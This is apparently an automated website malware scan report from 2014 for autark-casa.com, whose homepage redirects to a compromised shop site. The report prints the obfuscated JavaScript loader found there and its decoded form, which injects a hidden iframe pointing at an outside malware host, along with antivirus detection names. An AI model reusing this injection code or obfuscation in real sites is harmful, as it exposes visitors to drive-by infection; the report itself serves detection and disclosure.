Malware Scanner report for autark-casa.com

Malicious/Suspicious/Total urls checked: 2/0/3

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "autark-casa.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=autark-casa.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://autark-casa.com/	HTTP/1.1 302 Found Connection: close Date: Fri, 26 Sep 2014 19:16:19 GMT Location: http://www.anticsa.com/shop/index.php?shop_ID=7&language=es&cPath=2304 Server: Apache Vary: Accept-Encoding Content-Length: 2 Content-Type: text/html X-Powered-By: PleskLin	clean
http://www.anticsa.com/shop/index.php?shop_id=7&language=es&cpath=2304	404 Not Found Content-Length: 55518 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa) f='-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-29z-29z87z-6z63z70z77z63z-6z85z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z62z73z84z79z61z59z68z8z67z72z9z61z73z79z7 ...[1415 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dozucaj.in/count27.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dozucaj.in/count27.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0' ...[854 bytes skipped]... Antivirus reports: Ikarus Trojan.IframeRef nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A DrWeb JS.IFrame.151 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A NANO-Antivirus Trojan.Script.Iframe.rpyhz F-Secure JS:Trojan.Iframe.A F-Prot JS/IFrame.HC.gen Norman IframeRef.DM GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A
http://www.anticsa.com/test404page.js	404 Not Found Content-Length: 55518 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa) f='-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-29z-29z87z-6z63z70z77z63z-6z85z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z62z73z84z79z61z59z68z8z67z72z9z61z73z79z7 ...[1415 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dozucaj.in/count27.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dozucaj.in/count27.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0' ...[854 bytes skipped]... Antivirus reports: Ikarus Trojan.IframeRef nProtect JS:Trojan.Iframe.A K7AntiVirus Riskware Emsisoft JS:Trojan.Iframe.A (B) McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A DrWeb JS.IFrame.151 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.V MicroWorld-eScan JS:Trojan.Iframe.A NANO-Antivirus Trojan.Script.Iframe.rpyhz F-Secure JS:Trojan.Iframe.A F-Prot JS/IFrame.HC.gen Norman IframeRef.DM GData JS:Trojan.Iframe.A Commtouch JS/IFrame.HC.gen BitDefender JS:Trojan.Iframe.A

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: autark-casa.com

Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Sep 2014 19:16:19 GMT
Location: http://www.anticsa.com/shop/index.php?shop_ID=7&language=es&cPath=2304
Server: Apache
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html
X-Powered-By: PleskLin

...2 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: autark-casa.com
Referer: http://www.google.com/search?q=autark-casa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for autark-casa.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools